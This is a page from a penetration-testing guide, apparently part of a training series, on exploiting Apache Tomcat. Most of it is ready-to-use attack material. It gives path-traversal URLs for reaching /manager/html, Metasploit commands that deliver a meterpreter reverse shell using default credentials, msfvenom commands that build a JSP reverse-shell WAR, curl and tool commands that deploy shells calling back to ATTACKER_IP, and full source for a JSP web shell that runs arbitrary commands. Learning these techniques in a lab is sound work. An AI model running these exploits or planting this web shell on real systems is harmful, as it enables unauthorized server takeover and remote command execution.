> For the complete documentation index, see [llms.txt](https://dev-angelist.gitbook.io/home/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dev-angelist.gitbook.io/home/common-services-pentest/web-services-80-443-8080/tomcat/exploitation.md).

# Exploitation

#### Topics

> 1. [Lab Setup & Configuration](/home/common-services-pentest/web-services-80-443-8080/tomcat/lab-setup-and-configuration.md)
> 2. [Enumeration](/home/common-services-pentest/web-services-80-443-8080/tomcat/enumeration.md)
> 3. [Exploitation](/home/common-services-pentest/web-services-80-443-8080/tomcat/exploitation.md)
> 4. [Mitigation & Hardening](/home/common-services-pentest/web-services-80-443-8080/tomcat/mitigation-and-hardening.md)

## **Common Vulnerabilities**

1. **Password Backtrace Disclosure**\
   Visiting **/auth.jsp** might reveal passwords in backtraces.
2. **Double URL Encoding**\
   Vulnerabilities like CVE-2007-1860 allow management interface access via:

   ```url
   pathTomcat/%252E%252E/manager/html
   ```
3. **Insecure Example Scripts**\
   Apache Tomcat versions 4.x–7.x include examples susceptible to XSS or information disclosure. Examples:
   * `/examples/jsp/num/numguess.jsp`
   * `/examples/servlet/HelloWorldExample`\
     Check and restrict access to these paths.
4. **Path Traversal**\
   Exploit path traversal with:

   ```url
   <tomcat_target_ip>/lalala/..;/manager/html
   ```

   or

   ```url
   http://<tomcat_target_ip>/;param=value/manager/html
   ```

***

## **Using Metasploit Framework**

Leverage the `tomcat_mgr_upload` exploit available in Metasploit for Tomcat file upload vulnerabilities. Launch Metasploit and execute the following commands:

```bash
msfconsole -q
search tomcat_mgr_upload
use 3
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
exploit
```

After exploitation, a reverse shell is obtained, allowing command execution via the `meterpreter` shell.

***

**Remote Code Execution (RCE)**

If you gain access to the **/manager/html** interface, you can upload and deploy a `.war` file to achieve RCE.

* Example:

  ```bash
  curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"
  ```

Metasploit can automate this:

```bash
use exploit/multi/http/tomcat_mgr_upload
```

To create a reverse shell WAR file:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war
```

***

## **Other Methods**

1. **TomcatWarDeployer**\
   Deploy shells or bind shells via:

   ```bash
   ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
   ```
2. **Clusterd**\
   Automate testing:

   ```bash
   clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war
   ```
3. **Manual Web Shell**\
   Example JSP for command execution:

   ```bash
   <FORM METHOD=GET ACTION='index.jsp'>
   <INPUT name='cmd' type=text>
   <INPUT type=submit value='Run'>
   </FORM>
   <%@ page import="java.io.*" %>
   <% 
      String cmd = request.getParameter("cmd");
      String output = "";
      if(cmd != null) {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      } 
   %>
   <pre><%=output %></pre>
   ```

   Package it into a WAR file and upload it.

***

## **Other Tools**

* [Apache Tomcat Scanner](https://github.com/p0dalirius/ApacheTomcatScanner)
